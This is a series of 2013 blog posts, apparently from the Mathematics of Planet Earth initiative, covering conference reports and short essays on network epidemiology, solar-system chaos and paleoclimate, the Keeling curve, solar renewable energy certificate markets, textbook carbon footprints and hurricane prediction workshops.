    At the upcoming June 17 – 21, 2013 AIM workshop “Exponential random network models,” Martina will join fellow organizers Sourav Chatterjee, Persi Diaconis, and Susan Holmes, to study these and related problems and with the goal of bringing social scientists and statisticians who study exponential random graph models into contact with an emerging group of mathematicians who use a variety of new tools, including graph limit theory and tools from statistical mechanics such as spin glasses.

    Here is an excerpt from the Morris website explaining in more detail the limitations of models of transmission. The goal is that random graph models will estimate the network parameters and simulate evolving networks.

    “Because infectious diseases are transmitted from person to person, our understanding of disease transmission and prevention are rooted in a theory of population transmission dynamics. The epidemiology of sexually transmitted diseases (STD) like HIV – how quickly they spread and who gets infected – is driven by the network of person-to-person contacts. Early epidemiological studies and mathematical models of this process provided a number of insights that led to changes in STD control strategies during the 1980s. With the advent of HIV, however, new challenges have emerged. Like other incurable infections, HIV has the potential to spread very broadly in a population under the right circumstances. This makes the “core group” concept from the 1980s somewhat less effective for HIV prevention. Much work has been done during the last 15 years to identify which aspects of the partnership network structure matter for the spread of HIV, and to collect data on partnership networks in many populations. Simulation studies have played a crucial role in this effort, by identifying the type of network structures that have large impacts on transmission dynamics. The confluence of data, theory, and methods has created a clear agenda for quantifying the influence of networks on HIV transmission risks. While many of the pieces of the emerging research program are now in place, there is a wide gulf between the network data and the current simulation modeling frameworks. Simulations typically create network effects indirectly, by varying parameters of some convenient function to produce a change in simulated networks. The observable network measures are thus outcomes of the model, rather than inputs. While this strategy has been very useful for orienting initial research, it has hamstrung our ability to evaluate the empirical transmission risk in observed networks.”

    Posted in Epidemiology, Mathematics, Public Health | 1 Comment

    Earth’s Climate at the Age of the Dinosaurs

    Is it possible to compute the past climate of the Earth at the time of dinosaurs? This question was answered by Jacques Laskar during his lecture entitled “Astronomical calibration of the Geological Time Scales” at the workshop “Mathematical models and methods for Planet Earth” at Istituto Nazionale di Alta Matematica (INdAM) on May 27-29.

    Laskar explained that Louis-Joseph Lagrange was the first to suggest a link between the past climates of the Earth and the variations of the parameters characterizing the Earth’s elliptical orbit: the latter concern the changes in the major axis, in the eccentricity, in the obliquity of the Earth’s axis, and in the precession of the Earth’s axis. These parameters undergo periodic oscillations, now called the Milankovitch cycles, with different periods between 20,000 and 40,000 years. These oscillations essentially come from the attraction exerted on the Earth by the other planets of the solar system. They have some influence on the climate, for instance when the eccentricity of the ellipse changes. The oscillations of the Earth’s axis also influence the climate: when the axis is more slanted the poles receive more Sun in summer but the polar ice spreads more in winter. And scientists compare the measurements of ice cores and sedimentary records, showing the correlation between the past climates and the computed oscillations of the parameters of the Earth’s orbit.

    But how do we compute these oscillations? We use series expansions to approximate the motion of the Earth when taking into account the attraction of the other planets of the solar system. But these series are divergent as was shown by Poincaré. Hence, the series can only provide precise information over a limited period of time. Jacques Laskar showed in 1989 that the inner planets of the solar system are chaotic and confirmed this later in 2009 with 2500 simulations in parallel of the solar system. One characteristic of chaos is sensitivity to initial conditions, which means that errors grow exponentially in time. Hence, inevitably, the errors of any simulation will grow so much that we can no more learn anything reliable from the simulation. The whole question is then: how fast grow these errors?

    This is measured by the Lyapunov time, which we will define here as the time before we lose one digit of precision—that is, the error is multiplied by 10. When modeling the planets, this Lyapunov time is 10 million years. The extinction of the dinosaurs took place 65 millions years ago, and simulating the solar system over 70 millions years we lose 7 digits precision. This is a lot, but it is still tractable, and it is relatively easy to prove that the Earth is “stable” at this time horizon. But when we speak of the influence of the parameters of the Earth’s orbit on the climate, we need more precision. It does not suffice to include in the simulations all planets of the solar system as well as the moon and the mean effect of the asteroid belt. The largest asteroids have to be considered individually, and some of them play a role. The two largest are Ceres and Vesta. Both are highly chaotic, with Lyapunov times of 28,900 years and 14,282 years, respectively. These asteroids are sufficiently large to have an influence on the orbit of the Earth, and there are other chaotic asteroids in the asteroid belt. Imagine: for each million years, the errors coming from Ceres are multiplied by 10^34 and those from Vesta by 10^70! In a paper “Strong chaos induced by close encounters with Ceres and Vesta” published in 2011 in Astronomy and Astrophysics, Jacques Laskar and his co-authors showed that we hit the wall and cannot obtain any reliable information past 60 million years. Hence, we may deduce the climate at the time of dinosaurs from geological observations, but there is no hope to compute it through backwards integration of the solar system.

    Christiane Rousseau

    Posted in Astrophysics, Mathematics, Paleoclimate | Leave a comment

    Ode to Cinderella Science

    Recently, while preparing a chapter on the Mauna Loa CO${}_2$ data for a forthcoming book [1], I came across an interesting article by Euan Nisbet in Nature [2]. The article was written in 2007, on the occasion of the 50th anniversary of the measurement program responsible for the longest continuous recording of atmospheric carbon dioxide.

    Keeling Curve

    Looking back, the “Keeling curve” of CO${}_2$ concentrations ranks among the most significant achievements of twentieth-century science. It established the connection between rising atmospheric CO${}_2$ concentrations and fossil-fuel burning, and provided conclusive evidence that a substantial fraction of the CO${}_2$ released by humans into the atmosphere was not removed by the biosphere. The Keeling curve changed our view of the world.

    But the perspective at the time was quite different. Monitoring is science’s Cinderella, unloved by the scientific community and poorly rewarded. It does not win glittering prizes, and publication nowadays is most often relegated to a Web site. Charles David Keeling’s 1960 paper [3] documenting the seasonal cycle and, more ominously, the annual rise in CO${}_2$ garnered citations slowly. The account of his tribulations, “Rewards and Penalties of Monitoring the Earth” [4], should be compulsory reading for politicians and science administrators. His work was often threatened, as is attested by a gap in the data in 1964 when underfunding briefly halted the measurements. At one point, his program managers ordered Keeling to guarantee two discoveries per year!

    in hindsight, Keeling was ahead of his time. He realized that, if we want to learn more about Earth’s climate system, we need more than models—we need data to test and improve our models. Mathematics owes a great deal of debt to the Cinderella scientists.

    [1] Hans G. Kaper and Hans Engler, Mathematics and Climate, Society for Industrial and Applied Mathematics (SIAM), to be published (2013).
    [2] Euan Nisbet, “Cinderella Science,” Nature, Vol 450, 789-790 (2007).
    [3] Charles D. Keeling, “The Concentration and Isotopic Abundances of Carbon Dioxide in the Atmosphere,” Tellus, Vol. 12, 200-203 (1960).
    [4] Charles D. Keeling, “Rewards and Penalties of Monitoring the Earth,” Annual Review of Energy and the Environment, Vol. 23, 25–82 (1998).

    Posted in Carbon Cycle, Climate Change | Leave a comment

    Fighting Crime with Numbers

    UCLA Professor Andrea Bertozzi gave a lecture at the University of Alberta on April 5th about the mathematics of crime. Dr. Bertozzi is applying the powerful tools of mathematics and big data analysis for mapping crime patterns – with implications for crime prevention. Read the full article in the Edmonton Journal of May 11, 2013.

    Posted in Data Visualization, Social Systems | Leave a comment

    Modeling the Progression and Propagation of Infectious Diseases

    Math of Planet Earth 2013, in addition to dealing with the Earth itself (climate, earthquakes, etc.) also deals with the biosphere and humanity’s relationship to it. Certainly the progression and propagation of infectious diseases is an important part of this. Two articles, written for a general audience, provide two examples from the applied mathematics literature that show how mathematics is used to model and understand the progression and propagation of certain kinds of infections.

    The first article analyzes early viral dynamics in HIV infections with the goal of ultimately better understanding treatment and prevention strategies.

    The second article also applied to HIV infections, dealing with “viral blips” — episodes of high viral production interspersed by periods of relative quiescence. These quiescent or silent stages are hard to study with experimental models. The article explores how certain mathematical models and analysis can help our understanding.

    Both articles are based upon recent papers that appeared in the SIAM Journal on Applied Mathematics.

    Posted in Disease Modeling, Mathematics | Leave a comment

    INdAM Workshop “Mathematical Models and Methods for Planet Earth”

    The workshop “Mathematical Models and Methods for Planet Earth,” organized by the Italian National Institute for Advanced Mathematics (INdAM) under the auspices of MPE2013 in Rome, May 27-29, finished a few days ago.

    The workshop offered an interesting view of the broad spectrum of ongoing applications of mathematics to life on our planet.

    Several presentations focused on the dynamics of planet Earth. Since Earth is a celestial body in the solar system, it is exposed to hazardous impacts with other natural or artificial objects (e.g., meteorites or spatial debris). It is also the basis of spatial missions designed by applying new concepts. Earth provides a delicate environment for millions of different life forms; thus, some talks were devoted the dynamics of the Earth’s interior, its oceans and climate (including its evolution on geological time scales). Moreover, science must consider human beings and their activities; thus, a significant part of the workshop focused on mathematical models of problems in medicine, biology, social prevention, economics, politics, internet diffusion, etc.

    All the speakers made a substantial effort to avoid too technical contents, so their presentations were accessible for a highly heterogeneous audience. The slides presented at the workshop are currently being collected and will be made available here.

    It is now time for the participants to relax and process at least part of the concepts and ideas presented at the workshop. Synthesizing the new trends in this kind of applied mathematics is a big effort, but it is worth a try.

    Let us start with the provocative question raised by one of the speakers (J. Laskar) at the end of the beautiful public lecture by Christiane Rousseau: “Nowadays, what can the Earth do for Mathematics?” At that moment, the question sounded as a bizarre attempt to reverse the problem: this kind of rhetorical argument can be very useful to improve the understanding of a wide problem, but it is not always meaningful. However, the question is extremely natural for people working in celestial mechanics, as was shown with a beautiful example in the last talk: The study of the secular variations of the planetary orbital elements pushed Lagrange and Laplace to introduce solutions of systems of linear differential
    equations. It took me a long time to realize that Laskar was probably referring to the changes experienced in the relation between applied mathematics and other fields of science in the past few decades.

    Astronomy and physics have been the main (perhaps, the only) sources of problems that enabled the birth of new branches of mathematics until the beginning of the 20th century. In this context, it is important to recall that, in Hilbert’s list of 23 unsolved problems in mathematics introduced at the International Congress of Mathematics in Paris in 1900, just one was concerned with arguments other than the pure mathematical ones: the axiomatization of physics. Moreover, in the past, the genesis of great ideas has often been the result of a beautiful interaction between experimental measures with a few significant digits that was explained by the “first order” of a new theory, the refinement of which was found in agreement with more precise new measures. To mention some examples, we can quote the discovery of the law of gravitation and the introduction of the two-body model or quantum mechanics and the study of light emissions of the hydrogen atom. This beautiful scenario with continuous positive interactions between mathematics, theoretical physics and technological progress involved in the experimental measures seems to have lost its nice simplicity. Nowadays, the amount of data in some scientific problems is often overwhelmingly large (as explained in
    Perozzi’s talk). Most of the speakers showed that in the last century mathematics was applied to many fields different from physics (e.g., game theory, dynamics of biological populations, etc.).

    The apparent loss of simplicity in the relations between mathematics and its applications is not by chance. The problems arising in sciences studying the Earth and the evolution of life presently point to a common Grand Challenge: complexity. The mathematical approaches shown in the talks at the workshop deal with complexity in various ways. First of all, mathematics is often used to extract meaningful information from the huge amount of data: even literary textual data can be successfully analyzed and classified by applying statistical concepts! Moreover, the role of mathematics is extremely important in providing well defined models to properly study problems. In this context, the approach often defines a sort of “Russian doll” structure of models of increasing difficulty. In particular, this was seen in some talks based on probabilistic techniques: some set of equations depending on many parameters were initially settled; then, some of the parameters were switched off, so to make the behavior of the system (sometimes numerically, other times in easy analytical ways) predictable and comparable with some expected/known phenomenon. Finally, the system was restudied by restoring the dependency on all the parameters previously neglected. Often, in the widest generality, the considered systems provide a lot of open subproblems which are hard to solve from a mathematical point of view. On the whole, mathematics is now relevant not only to provide solutions but also to set up well-posed problems.

    As a final comment on the INdAM MPE2013 initiative, let us consider the new trends about people working in mathematics. Everybody can see that complexity often makes the things more complicated and, thus, mathematicians in universities and research centers are more and more specialized in their own field(s) of interest. Who can now master so many mathematical arguments as Poincaré or Hilbert were able to do a century ago? All the speakers of the workshop clearly showed that mathematicians are now challenged also in the opposite direction: more and more research topics require deep mathematical knowledge, often to tackle problems in the context of teams. The abstraction can allow mathematics to still be pure, but mathematicians are more and more requested to be part of the rest of the scientific community.

    Ugo Locatelli
    Univ. of Rome “Tor Vergata”

    Posted in Conference Report, Mathematics | 1 Comment

    The Mathematics Behind Biological Invasions — An MPE Event

    The Pacific Institute for the Mathematical Sciences (PIMS) is organizing a Mathematical Biology Summer School at the University of Alberta in Edmonton, Canada, May 27-June 14, 2013, on a topic highly relevant to Mathematics of Planet Earth, namely “The Mathematics Behind Biological Invasions”.

    Humans have introduced most of the alien species found worldwide. If these species manage to survive, reproduce, spread and finally harm a new environment, they are called invasive. Invasive species can change habitats and ecosystem processes, crowd out native species or damage human activities, ultimately costing the global economy an estimated \$1.4 trillion per year. The dramatic progression of an invasion involves a series of complex dynamical processes that requires sophisticated mathematical language to describe, quantify and investigate. This summer school focuses on the development and analysis of mathematical models that have and can be applied to these processes.

    The summer school is based on three components: lectures, computer labs and group projects. The first two weeks will focus on the lectures and computer labs. Four international Distinguished Lecturers will give the lectures, and the computer labs will apply their lecture material to the modelling and analysis real biological invasions. The focus on the last week will be group projects where students will apply their modelling, mathematical and computational skills to solving problems in the area of biological invasions.

    This event is organized primarily by Thomas Hillen from the University of Alberta. The main lecturers are Alan Hastings (UC Davis, USA), Mark Lewis (University of Alberta, Canada), Jonathan Sherratt (Heriot Watt University, UK) and Sergei Petrovskii (Leicester University, UK).

    This summer school is an activity sponsored by the PIMS International Graduate Training Centre in Mathematical Biology, which is a training program focused on recruiting and supporting graduate students in this important interdisciplinary area in Western Canada. More information can be found here.

    Alejandro Adem
    PIMS

    Posted in Ecology, Mathematics, Workshop Announcement | Leave a comment

    MPE-Related News Items

    Several articles in the past few weeks have caught my attention.

    One that I really liked is an article in the New Yorker that describes two guys who have started a company that makes packing material out of green waste injected with mycelium (the substance that provides structure to mushrooms). It breaks down after a relatively short time (unlike styrofoam, which breaks down into styrene particles – observed like snowflakes all over the Jersey shore after Sandy – and which are carcinogenic). They were spurred on by a course on inventions they took at RPI from the very persistent and knowledgeable Professor Burt Swersey. It’s a great story!

    A second story was in an article in the Mercury News about Jerry Brown seeming to be concerned about the environment but not being willing to put California’s money where his mouth is. From the article, Brown said to an audience at the Sustainable Silicon Valley’s fourth annual Water, Energy and Smart Technology (WEST) Summit at NASA Ames Research Center

    “[$\ldots$] that clearly communicating the argument that the world must act now is crucial because news media too often neglect climate change stories in favor of more titillating journalism, while lawmakers won’t act unless confronted with concrete, consensus-backed facts. `We’re really in a war here, a contest for ideas, and this crowd is on the losing end,’ he told the scientists. Just like in electoral politics, `your base is important, but you’ve got to convince the swing voter to win,’ the Democratic governor said.”

    It seems to me that Brown deserves a lot of credit for getting California back on its feet – there is a reported surplus to this year’s state budget estimated to be between one and four billion dollars. But Brown is being very conservative about committing this surplus to program spending. Still more persuasive arguments about the imperative of dealing with environmental issues are needed.

    This brings me to a third story, which asks the question whether we can “geo-engineer” our way out of the mess we’ve seem to have gotten the Earth into? For example (far-fetchedly), could we build giant vacuum cleaners that suck some of the carbon dioxide out of the atmosphere? The author warns about messing with something as large and unpredictable as the entire earth’s climate system (remember the mathematician’s warning in Jurassic Park?). And also warns against being constantly of the opinion that we can engineer our way out of any situation we get into – one consequence being that we become carelessly overconfident. Kent Morrison comments: “One thing about math is that we know what we know and what we don’t know. Geo-engineering is quite the opposite.”

    A fourth story (many sources) is about the Oklahoma Senators, Inhofe and Coburn, who opposed relief aid for Sandy yet are requesting Oklahoma tornado aid from FEMA. I’m sure that I’m being hopelessly naive, but it seems to me that there should be a (mathematical!) estimate of what FEMA needs on average per year and that, when there is an emergency, an independent board should decide how to allocate the funds. Having our congressional bodies vote on each allocation is ridiculous: it politicizes yet another aspect of our lives that politics should not enter.

    Finally, I want to mention the New York Times editorial “The wisdom of Bob Dole” about Bob Dole’s lamentations on Fox News Sunday about the current incarnation of the Republican Party, which he’s pretty sure neither he nor Ronald Reagan would be welcome in. The New York Times writes

    “Its (the Republican Party’s) members want to dismantle government, using whatever crowbar happens to be handy, and they don’t particularly care what traditions of mutual respect get smashed at the same time. [$\ldots$] This corrosive mentality has been standard procedure in the House since 2011, but now it has seeped over to the Senate. Mr. Rubio is one of several senators who have blocked a basic function of government: a conference committee to work out budget differences between the House and Senate so that Congress can start passing appropriations bills. They say they are afraid the committee will agree to raise the debt ceiling without extorting the spending cuts they seek. One of them, Ted Cruz of Texas, admitted that he didn’t even trust House Republicans to practice blackmail properly. They have been backed by Mitch McConnell, the minority leader, who wants extremist credentials for his re-election.”

    Our system is being “gamed” in new ways. Are we stuck in this morass? What, if anything, does game theory predict about the future of our current quandary of having rule-making bodies that cannot actually agree on any rules?

    Posted in Climate, General, Mathematics, Political Systems, Resource Management, Sustainability | Leave a comment

    SIAM Conference on Applications of Dynamical Systems, Snowbird, May 19-23

    The SIAM Activity Group on Dynamical Systems (SIAG/DS) held its biennial meeting (DS13) at the Snowbird Ski and Summer Resort in Snowbird, Utah, May 19-23, 2013. The meeting was attended by more than 800 participants from academia, industry, and the national laboratories. The program featured nine invited lectures, 136 minisymposia, 191 contributed papers, and 88 posters.

    Many events at DS13 related to MPE2013. I especially liked the invited lecture by Paul Johnson (Los Alamos National Laboratory), who illustrated the crucial role of granular materials in the triggering of slip processes in the Earth’s crust. Other invited lectures of interest were given by Adrian Constantin (Imperial College London) on particle trajectories beneath irrotational traveling water waves and Jean-Luc Thiffeault (U Wisconsin, Madison) on the topology of fluid mixing.

    A new feature of the program was a daily set of four “Featured Minisymposia.” These minisymposia had been selected by the conference organizers because they might attract a broader audience than regular minisymposia. The organizer of a Featured Minisymposium was asked to give an introduction to the topic area in the first talk, and each of the speakers had five more minutes for their presentation (20+5 minutes, as opposed to 15+5 minutes in a regular minisymposium). As chair of the SIAG/DS I had the privilege of organizing a Featured Minisymposium on “Dynamics of Planet Earth” (MS38), described in an earlier blog posted on May 15. The other Featured Minisymposium which I particularly enjoyed was “Dynamics of Marine Ecosystems” (MS97), organized by Drew LaMar and Leah Shaw (College of William and Mary). Two Minisymposia were of special interest to the climate research community: “Hierarchical Modeling of Sea Ice” (MS36), organized by Renate Wackerbauer (University of Alaska, Fairbanks), and “Data Assimilation: Ensemble, Lagrangian, and Parameter Estimation” (MS109), organized by Tom Bellsky (Arizona State University, Ed Lorenz Postdoc with the Mathematics and Climate Research Network). For those of us interested in issues of climate and sustainability, there were many noteworthy contributions in regular minisymposia, contributed paper sessions and the poster session. I mention the talks by Esther Widiashi (ASU) and Anna Berry (U MInnesota) on non-smooth energy balance models, Karna Gowda (Northwestern U) on Turing patterns for semi-arid ecosystems, and the posters by Adam Mallen (Marquette U) on assimilation of Lagrangian ocean data and Eric Siero (Leiden U) on vegetation patterns under slowly varying conditions. [With apologies to all the presenters not listed here.]

    Details of the conference program can be found here.

    The invited lectures and some of the minisymposia have been recorded and will be posted on-line at SIAM Presents.

    The next SIAM Conference on Applications of Dynamical Systems will be held at Snowbird, May 17-21, 2015.

    Posted in Climate, Conference Report, Mathematics | Leave a comment

    Mathematics shines some light on the growing markets for solar renewable certificates

    In recent years, governments around the world have experimented with many different policy tools to encourage the growth of renewable energy. In particular, it is clear that subsidies are needed to stimulate investment in clean technologies like wind and solar that are not yet able to compete effectively on cost alone (especially in the US today, where cheap natural gas is showing the potential to dominate!). Economists, politicians and journalists actively debate the merits and limitations of various subsidies, tax incentives, or of feed-in tariffs in electricity markets, popular in many European countries. However, an interesting alternative is also growing rapidly at the state level in the US: markets for tradable renewable energy certificates (RECs), or as a subcategory, solar renewable energy certificates (SRECs). Here we discuss the vital role that mathematics can play in helping to better understand these important new markets.

    Over the last decade or so, about 30 states have implemented specific targets for renewable energy growth as part of a so-called Renewable Portfolio Standard (RPS). Among these, many have a specific “solar carve-out,” a target for the solar sector in particular, in addition to renewables overall. To achieve these goals, about 10 states have launched SREC markets, with New Jersey (NJ) being the largest and most ambitious so far (targeting 4.1% solar electricity by 2028). It is worth noting that similar markets for “green certificates” also exist in various countries around the world.

    The basic idea is that the government sets specific requirement levels for solar energy in the state in each future year as a percentage of total electricity generation. Throughout each year, certificates (SRECs) are issued to solar generators for each MWh of solar power that they produce. These can then be sold in the market to utility companies, who must submit the required number of SRECs at each compliance date (once per year). Anyone not meeting the requirement must instead pay a penalty (known as the SACP), which is typically chosen to decrease from year to year, but has been as high as \$700 per MWh in the New Jersey market.

    While the concept is straightforward and intuitive (and parallels that of a cap-and-trade market for CO2 emissions), the implementation is far from simple, with different states already trying many variations for setting future requirement and penalty levels. Another important policy consideration is the number of “banking” years permitted, meaning how long SRECs remain valid for compliance after they are first issued (e.g., currently a 5-year lifetime in NJ). A fundamental challenge for regulators is trying to choose appropriate requirement levels many years in advance, such that the market does not suddenly run into a large over- or undersupply of certificates, causing prices to swing wildly.

    In New Jersey for example, SREC market prices dropped from over \$600 throughout most of 2011 to under \$100 by late 2012 in the wake of a huge oversupply, and this despite a major rule change passed in 2012 (more than doubling the 2014 requirement) to help support price levels. On the one hand, the large oversupply was good news, signaling the success of the SREC market in enabling solar in NJ to grow very rapidly between 2007 and 2012 (from under 20MW to nearly 1,000MW of installed capacity). On the other hand, this initial success of the market brings with it some risk for its future. At only \$100 an SREC and with the possibility of further price drops, will investors now shy away from new solar projects?

    Like all financial markets, SREC markets can provide very rewarding opportunities for investing (in new solar farms in this case). But they also come with significant risk due to volatile price behavior. Financial mathematics, a field that has grown rapidly over several decades now, is well versed in analyzing and modeling such risks and returns. However, most financial mathematicians work on classical markets for stocks or bonds, instead of venturing into the peculiarities of commodity prices, and even more so those of RECs. Nonetheless, commodities, energy and environmental finance is a rapidly growing subfield and popular research area these days (see for example the May 7th blog post on the Field Institute’s activities).

    So how can mathematical modeling help us to better understand SREC markets? And why is it important to do so? In recent and ongoing work at Princeton University [1], we propose an original approach to modeling SREC prices, which is able to reproduce New Jersey’s historical price dynamics to an encouraging degree. Drawing on some ideas from existing literature in carbon allowance price modeling, we create a flexible framework that can adapt to the many rule changes that have occurred. In particular, we treat SREC prices as combinations of “digital options” on an underlying process for total solar power generation, since SRECs essentially derive their value from the probability of the market being short of certificates and paying a penalty at one or more future compliance dates. However, a key additional challenge comes in capturing an important feedback effect from prices onto the stochastic process for generation. As today’s prices increase, future generation growth rates should also increase (as more solar projects are built), which in turn reduces the probability of future penalty payments, feeding back into today’s price. An equilibrium price emerges, which can be solved for via dynamic programming techniques.

    This is an example of a “structural” model, which combines economic fundamentals of supply and demand with tractable stochastic processes and convenient mathematical relationships. Academic literature on energy-price modeling covers a wide range of different approaches and makes use of a diverse set of mathematical tools, from partial differential equations (PDEs) to stochastic processes, optimization and statistical estimation procedures. The feedback discussed above has even been shown to produce interesting applications of complicated “forward-backward SDEs” in the case of carbon markets. Nonetheless, the specific application to SREC markets is extremely new, and we hope to encourage more research in this young and exciting field.

    Understanding the behavior of SREC prices is crucial both for investors contemplating a new solar project and for regulators determining how best to design the market or set the rules. How does price volatility vary with regulatory policy? For example, can we effectively implement a requirement growth rule which dynamically adapts to the shortage or surplus of SRECs in the previous year? (as has in fact been attempted in Massachusetts). Can this avoid the need for frequent legislation to rewrite the rules at great uncertainty to all market participants? How can we best avoid sudden price swings, while preserving the attractive features of these markets and their abilities to stimulate growth of solar? While our model allows us to begin to address such important market design issues, many interesting and relevant questions remain to be investigated, and we look forward to continuing to explore this promising new area of applied mathematics!

    The reference for our first paper on this topic is given below. For further details on the NJ SREC market, the websites of NJ Clean Energy, SREC trade and Flett Exchange all provide useful and up-to-date information.

    [1] Coulon, M.; Khazaei, J.; Powell, W. B.; SMART-SREC: A Stochastic Model of the New Jersey Solar Renewable Energy Certificate Market; working paper, Dept of Operations Research and Financial Engineering, Princeton University.

    Michael Coulon
    Princeton University
    mcoulon@Princeton.EDU

    Posted in Economics, Finance, Renewable Energy | Leave a comment

    INdAM Workshop — “Mathematical models and methods for Planet Earth”

    The National Institute of Advanced Mathematics (INdAM) has organized a Workshop on “Mathematical models and methods for Planet Earth,” which will take place in Rome, Italy, on May 27-29, 2013. This MPE2013 event is organized by Alessandra Celletti (Università di Roma Tor Vergata), Ugo Locatelli (Università di Roma Tor Vergata), Tommaso Ruggeri (Università di Bologna) and Elisabetta Strickland (Università di Roma Tor Vergata). An international group of mathematicians with expertise in a wide range of application areas will present results on several themes related to MPE2013. Information on the workshop is available on the Workshop Web site.

    The National Institute of Advanced Mathematics (INdAM) is an Italian partner of MPE2013. Founded in 1939 by the noted mathematician Francesco Severi, INdAM aims to train researchers in mathematics, especially in emerging areas of research; to foster the transfer of knowledge to technological applications; and to support contacts between Italian and international mathematical research. To achieve its objectives, INdAM promotes fellowships from the undergraduate level to experienced researchers and organizes workshops, meetings and schools.

    Speakers at the workshop will discuss mathematical methods and stochastic models to understand emerging collective behavior in complex systems arising, for example, in the social, economic and behavioral sciences, where large numbers of units interact. They will illustrate the important role of mathematical modeling and simulation in biology and medicine, with applications ranging from the behavior of cells and tissues to the description of tumor growth. The leading role of mathematics to support our planet will be further illustrated by the attribution of authorship of literary texts and by models for future internet information dissemination.

    Besides the investigation of human related aspects, mathematics enables the study of the physical characteristics of our planet. Most notably, some talks will be devoted to the calibration of geological time scales (a crucial aspect which allows us to retrieve specific events in Earth’s history), to the investigation of boundary layers associated with large-scale ocean circulation and, going up in the atmosphere, to study Earth’s climate variability and changes using the theory of dynamical systems.

    Safeguarding planet Earth is not limited to our planet and its atmosphere. Since the Earth is a part of the solar system, we must also investigate the interaction of the Earth with the other neighboring bodies populating our universe. The N-body problem enables us to study the stability of the Earth’s dynamics as well as to devise new interplanetary trajectories. The recent impact of the meteorite at Chelyabinsk (Russia) signaled the necessity to develop mitigation strategies to safeguard planet Earth from near-earth asteroid hazards. Lastly, we must also be concerned about the space debris from dismissed satellites and fragments which form a dangerous envelope surrounding the Earth: a mathematical investigation of the dynamics of space debris has become urgent.

    A special event at the workshop will be the public lecture by Christiane Rousseau (Université de Montréal), vice-president of the International Mathematical Union. The title of the lecture is “Mathematics of Planet Earth”. The talk will deal with the complexity of the Earth as a whole and will highlight the role of mathematics in protecting and discovering our planet.

    The joint effort of all scientists participating in MPE2013 will show that our planet is the setting for all sorts of dynamic processes. The challenges facing our planet and our civilization are multidisciplinary and multifaceted: the mathematical sciences play a central role in the scientific effort to understand and deal with these challenges. MPE2013 will also enable us to train a new generation of researchers working on scientific problems that will motivate students by providing stimulating answers to questions like “What is mathematics good for?”

    We conclude by quoting Marta Sanz-Solé, President of the European Mathematical Society, who pointed out, at the MPE Day held at the UNESCO Headquarters in Paris on March 5, that “The MPE2013 initiative will expose mathematicians to the whole world, by showing their usefulness and stimulating research. From now on, mathematics can be no more associated to pure intellectual exercise without connection to the most important problems of mankind.” We hope that the INdAM workshop will contribute to the goals of MPE2013.

    Alessandra Celletti and Elisabetta Strickland
    Università di Roma Tor Vergata

    Posted in Mathematics, Workshop Announcement | Leave a comment

    BIRS Workshop — “Non-Gaussian Multivariate Statistical Models and their Applications”

    A diverse group of 42 scholars from 15 countries converged this week at the Banff International Research station (BIRS) for a workshop on “Non-Gaussian Multivariate Statistical Models and their Applications.”

    The workshop consisted of a variety of talks and presentations on the theory and applications of copulas and skew-elliptical distributions when used as multivariate models. One of the aims was to generate intellectual discussion of the use of these statistical models for analyzing data arising from several disciplines. Applications varied from disciplines including but not limited to climate change, finance, insurance, and medicine.

    For example, a multivariate framework was constructed to understand the uncertainties resulting from expert opinions of future sea-level rise from ice sheets in East and West Antartica and Greenland. Multivariate spatial models were also used to analyze the brain activities of individuals with certain neurological disorders such as Down Syndrome.

    This first-of-a-kind workshop is expected to provide avenues for further advancements of research in this exciting topic.

    Details about the workshop can be found here.

    Marc G. Genton, Professor of Statistics
    CEMSE Division, Al Khwarizmi Building, Office 0111
    King Abdullah University of Science and Technology
    Thuwal 23955-6900
    Saudi Arabia
    marc.genton@kaust.edu.sa

    Posted in Statistics, Workshop Report | Leave a comment

    The Carbon Footprint of Textbooks

    Compared with a conventional textbook it’s obvious that an e-text saves energy and reduces greenhouse gas emissions—or is it?

    When you actually look at the way students use both kinds of textbooks the obvious turns out to be not so obvious. Looking at the behavior of college students is exactly what Thomas F. Gattiker, Scott E. Lowe, and Regis Terpend did in order to determine the relative energy efficiency of electronic and conventional hard copy textbooks.

    They used survey data from 200 students combined with life cycle analysis of digital and conventional textbooks and found that on the average the carbon footprint for digital textbooks is a bit smaller but not as much smaller as you would hope.

    In a short summary article for The Chronicle of Higher Education, Gattiker and Lowe write:

    “We discovered that when we consider all greenhouse-gas emissions over the life cycle of the textbook, from raw-material production to disposal or reuse, the differences between the two types of textbooks are actually quite small. Measured in pounds of carbon-dioxide equivalent (CO2e), a common unit used to measure greenhouse-gas emissions, the use of a traditional textbook resulted in approximately 9.0 pounds of CO2e per student per course, versus 7.8 pounds of CO2e for an e-textbook.”

    However, there is a wide variability in the energy used by individual students, and the reasons are easy to understand. Some of the factors that matter are:

    • the device on which the e-text is read (desktop computer, laptop, dedicated e-reader)
    • the number of pages printed by the student and whether the pages were two-sided or single-sided
    • the source for the electric power (hydro, coal, natural gas)
    • the number of times a hard-copy book is resold

    Compare a 500-page conventional text with the same text in digital format. If the student reads it on a desktop computer located where electric power is generated by burning coal and if the student prints 200 one-sided pages, then the carbon footprint is much greater for the e-book. But if the student reads it on an e-reader, doesn’t print much, and gets hydro-electric power, then the e-book has a much smaller carbon footprint.

    They identify three “levers” that college faculty and students can use to reduce the carbon load associated to textbooks:

    • Encourage multiple use of hard-copy textbooks.
    • Read e-texts on laptops and dedicated readers rather than desktop computers.
    • Print on both sides with recycled paper.

    The full article describing the research of Gattiker, Lowe, and Termpend is “Online Texts and Conventional Texts: Estimating, Comparing, and Reducing the Greenhouse Gas Footprint of two Tools of the Trade,” Decision Sciences Journal of Innovative Education, Volume 10, Issue 4, pages 589-613, October 2012.

    Posted in Economics, Resource Management | Leave a comment

    SAMSI Undergraduate Workshop — Predicting the 2013 Hurricane Season Using Real Data

    During the week of May 13, 2013, thirty-four students from around the United States attended the Statistical and Mathematical Sciences Institute (SAMSI) Undergraduate Modeling Workshop. On the first day, students had an opportunity to learn about tropical storm formation and hurricane forecasting from Dr. Carl Schreck, a researcher at the Cooperative Institute for Climate and Satellites North Carolina. They also heard talks from a statistician, Dr. Richard Smith, the Director of SAMSI, and a mathematician, Dr. Chris Jones from the University of North Carolina, both involved with climate research. Later in the week, the students also attended a talk by Dr. Montserrat Fuentes, from the Department of Statistics at North Carolina State University, on statistical methods for studying pollution.

    For the bulk of the week, the students worked on modeling and analyzing hurricane prediction data acquired from the database used by researchers at NCSU to forecast characteristics of each year’s hurricane season. Students got an introduction to the database and also the opportunity to use climate data products to update entries in the database. After understanding how the data were acquired and ‘cleaned up’, various SAMSI post-docs and graduate fellows gave tutorials on Poisson regression and its implementation using R to predict the number of landfalls along the eastern US for the 2013 hurricane season. On the final morning, students gave their presentations, many of which are available on the SAMSI website.

